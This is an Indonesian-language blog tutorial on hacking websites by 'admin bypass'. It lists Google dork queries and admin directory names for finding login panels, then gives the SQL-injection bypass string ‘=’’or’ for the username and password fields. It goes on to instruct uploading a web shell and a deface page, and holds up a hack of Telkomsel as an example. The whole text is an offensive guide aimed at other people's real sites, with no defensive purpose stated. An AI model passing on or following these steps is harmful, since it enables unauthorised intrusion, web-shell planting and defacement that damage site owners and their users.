Cara Hack Website dengan Teknik Bypass Admin
Jika ingin deface dengan Bypass Admin, siapkan terlebih dulu Dork dan Shell Extensi. Untuk yang belum mengerti apa itu dork, dork adalah tools hacking yang bisa dibuat oleh siapa saja. Anda bisa menggunakan Dork di bawah ini :List Fresh Dork Magento Full Terbaru 2018 Lengkap:
inurl:/admin/index.php intext:username
inurl :/admin/Admin.php intext:login
20. "inurl:admin/addproject.???"
21. "inurl:admin/addsale.???"
22. "inurl:admin/addschool.???"
23. "inurl:admin/addstate.???"
24. "inurl:admin/admin.???"
25. "inurl:admin/admincp.???"
26. "inurl:admin/payment.???"
27. "inurl:admin/selectitem.???"
28. "inurl:admin/settings.???"
29. "inurl:admin/showbook.???"
30. "inurl:admin/viewmanager.???"
31. "inurl:admin/viewproduct.???"
32. "inurl:user/emp.???"
33. 0admin/
34. 0manager/
35. AdminTools/
36. Database_Administration/
37. Indy_admin/
38. LiveUser_Admin/
39. Lotus_Domino_Admin/
40. PSUser/
41. Server/
42. ServerAdministrator/
43. Super-Admin/
44. SysAdmin/
Mari kita mulai hacks cara deface Bypass Admin :
Dorking ke Google, misalnya dengan memilih dork : inurl:/admin/index.php intext:username
Isi username dan password dengan kode ini ‘=’’or’
Perhatikan gambar.
Jika ada celah / atau website tersebut VULN, maka Anda bisa masuk ke Control Panel / Admin Panel web tersebut. Namun jika login gagal, Anda bisa mencari web vuln yang lain, atau kembali lagi dorking.
Tetapi jika login berhasil, Anda bisa melakukan apapun sesuai dengan keinginan Anda. Atau jika beruntung, Anda bisa upload shell, file-file html yang anda sudah siapkan.
Upload shell yang Anda miliki. Jika sudah, upload shell dan langkah selanjutnya adalah mencari letak shell yang sudah Anda upload. Jika sudah, upload halaman deface Anda, maka shell yang anda upload akan tampil, seperti gambar dibawah ini, atau dari ss peretasan yang pernah terjadi pada situs-situs di Indonesia.
Peretasan yang terjadi pada situs Telkomsel.
sumber : https://www.artikelcara10.com
